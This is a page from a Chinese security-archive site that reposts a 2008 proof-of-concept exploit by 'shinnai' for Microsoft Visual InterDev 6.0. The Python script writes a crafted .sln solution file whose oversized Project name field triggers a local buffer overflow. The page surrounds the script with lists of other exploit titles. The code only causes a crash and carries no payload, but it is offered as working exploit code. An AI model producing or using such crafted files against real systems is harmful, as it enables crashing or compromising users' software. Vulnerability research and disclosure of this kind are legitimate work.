首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Visual InterDev 6.0 (SP6) SLN File Local Buffer Overflow PoC
来源:http://shinnai.altervista.org 作者:shinnai 发布时间:2008-04-07  
#usage: exploit.py FileName

import sys

print "--------------------------------------------------------------------------------"
print ' [PoC 2] Microsoft Visual InterDev 6.0 (SP6) ".sln" files Local Buffer Overflow'
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.org\n"
print " Execution of arbitrary code is possible, but it annoys me at the moment :)"
print "--------------------------------------------------------------------------------"

buff      = "a" * 264 + "bbbb" + "c" * 256

try:
    sln_file = \
        'Microsoft Visual Studio Solution File, Format Version 1.00\n'+\
        'Project("{}") = "' + buff + '"\n'+\
        'EndProject\n'
   
    out_file = open(sys.argv[1] + ".sln",'w')
    out_file.write(sln_file)
    out_file.close()
    print "\nFILE CREATION COMPLETED!\n"
except:
    print " \n -------------------------------------"
    print "  Usage: exploit.py FileName"
    print " -------------------------------------"
    print "\nAN ERROR OCCURS DURING FILE CREATION!"

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·XnView 1.92.1 Slideshow (FontN
·Xitami Web Server v2.5c2 LRWP
·Novel eDirectory HTTP Denial o
·SCO UnixWare < 7.1.4 p534589 (
·Mcafee EPO 4.0 FrameworkServic
·SCO UnixWare Reliant HA Local
·HP OpenView NNM 7.5.1 OVAS.exe
·SCO UnixWare Merge mcd Local R
·Nuked-Klan <= 1.7.6 Multiple V
·MS Visual Basic Enterprise Ed.
·ChilkatHttp ActiveX 2.3 Arbitr
·Sun Solaris <= 10 rpc.ypupdate
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved